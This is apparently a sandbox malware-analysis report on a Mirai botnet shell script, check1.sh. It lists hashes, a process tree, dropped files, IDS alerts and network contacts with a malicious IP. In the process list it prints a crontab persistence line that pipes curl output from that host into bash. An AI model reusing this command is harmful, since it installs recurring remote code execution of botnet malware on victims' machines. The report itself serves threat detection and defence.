File name:

check1.sh

Full analysis: https://app.any.run/tasks/b7feb49c-ca14-4947-92a6-02b1a262df0f
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: February 26, 2026, 04:37:00
OS: Ubuntu 22.04.2
Tags:
nohuptest
auto
mirai
botnet
MIME: text/x-shellscript
File info: Bourne-Again shell script, Unicode text, UTF-8 text executable
MD5:

C1286D9941BA508E892242AFCE176572

SHA1:

97CFDCE4436015EE4A1B9AD2E108E1CD44605CA7

SHA256:

6574E3E5A6E0167077DDE72BCD72E1FD3A79E61AA9E6E76AB6329C13CA7EA6E4

SSDEEP:

24:VUeYj+H13UbEDMK9CFdYhEnHQBYcduuD9I5TUbDNuUbDNARiy3AnQZaZl1cSRs/:VUeYj+H1rDMK9CnYhEkDrpuiywOjSu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been found (auto)

      • curl (PID: 1984)
      • wget (PID: 1994)

  • SUSPICIOUS

    • Reads passwd file

      • crontab (PID: 1972)
      • crontab (PID: 1971)
      • crontab (PID: 1968)
      • curl (PID: 1984)

    • Modifies file or directory owner

      • sudo (PID: 1962)

    • Modifies Cron jobs

      • bash (PID: 1966)

    • Gets information about currently running processes

      • bash (PID: 1966)
      • bash (PID: 1976)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 1966)

    • Potential Corporate Privacy Violation

      • curl (PID: 1984)
      • wget (PID: 1994)

    • Process resilience attempt

      • bash (PID: 1975)

    • Uses wget to download content

      • bash (PID: 1966)

    • Clears command history

      • rm (PID: 2022)

  • INFO

    • Checks timezone

      • crontab (PID: 1972)
      • crontab (PID: 1968)
      • crontab (PID: 1971)
      • wget (PID: 1994)

    • Creates file in the temporary folder

      • flock (PID: 1974)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
276
Monitored processes
157
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs crontab no specs grep no specs bash no specs crontab no specs crontab no specs pgrep no specs flock no specs rm no specs bash no specs sleep no specs bash no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs #MIRAI curl pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs #MIRAI wget pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs sleep no specs chmod no specs bash no specs rm no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs rm no specs rm no specs rm no specs rm no specs rm no specs rm no specs clear no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs

Process information

PID
CMD
Path
Indicators
Parent process
1961/bin/sh -c "sudo chown user /tmp/check1\.sh && chmod +x /tmp/check1\.sh && DISPLAY=:0 sudo -iu user /tmp/check1\.sh "/usr/bin/dash2EwNpII9hL0vkNEQ
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1962sudo chown user /tmp/check1.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1963chown user /tmp/check1.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1964chmod +x /tmp/check1.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1965sudo -iu user /tmp/check1.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1966/bin/bash /tmp/check1.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
1967/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1968crontab -l/usr/bin/crontabbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1969grep -Fq "*/5 * * * * /usr/bin/bash -c 'cd /tmp && bash <(curl -s http://185\.208\.159\.67/check1\.sh)' &"/usr/bin/grepbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre.so.3.13.3
/usr/lib/x86_64-linux-gnu/libc.so.6
1970/bin/bash /tmp/check1.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
2
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
1971crontab/var/spool/cron/crontabs/usertext
MD5:
SHA256:
1984curl/var/tmp/Error84binary
MD5:
SHA256:
1994wget/var/tmp/Error84.1binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
9
DNS requests
12
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.49:80
http://connectivity-check.ubuntu.com/
unknown
unknown
1984
curl
GET
200
185.208.159.67:80
http://185.208.159.67/Error84
unknown
unknown
1994
wget
GET
200
185.208.159.67:80
http://185.208.159.67/Error84
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
456
avahi-daemon
224.0.0.251:5353
whitelisted
91.189.91.49:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
1984
curl
185.208.159.67:80
SWISSNETWORK02
SC
malicious
473
snapd
185.125.188.57:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
1994
wget
185.208.159.67:80
SWISSNETWORK02
SC
malicious
416
systemd-timesyncd
185.125.190.57:123
ntp.ubuntu.com
CANONICAL-AS
GB
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.20.142
  • 2a00:1450:4001:c21::8b
  • 2a00:1450:4001:c21::71
  • 2a00:1450:4001:c21::64
  • 2a00:1450:4001:c21::8a
whitelisted
connectivity-check.ubuntu.com
  • 91.189.91.49
  • 185.125.190.49
  • 185.125.190.97
  • 185.125.190.18
  • 185.125.190.96
  • 91.189.91.98
  • 91.189.91.48
  • 91.189.91.97
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.98
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::96
  • 2001:67c:1562::24
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::23
whitelisted
3.100.168.192.in-addr.arpa
whitelisted
api.snapcraft.io
  • 185.125.188.57
  • 185.125.188.58
  • 185.125.188.59
  • 185.125.188.54
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::2d6
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2cc
whitelisted
ntp.ubuntu.com
  • 185.125.190.57
  • 91.189.91.157
  • 185.125.190.56
  • 185.125.190.58
  • 2620:2d:4000:1::40
  • 2620:2d:4000:1::41
  • 2620:2d:4000:1::3f
whitelisted

Threats

PID
Process
Class
Message
1984
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
1984
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
1994
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
check1.sh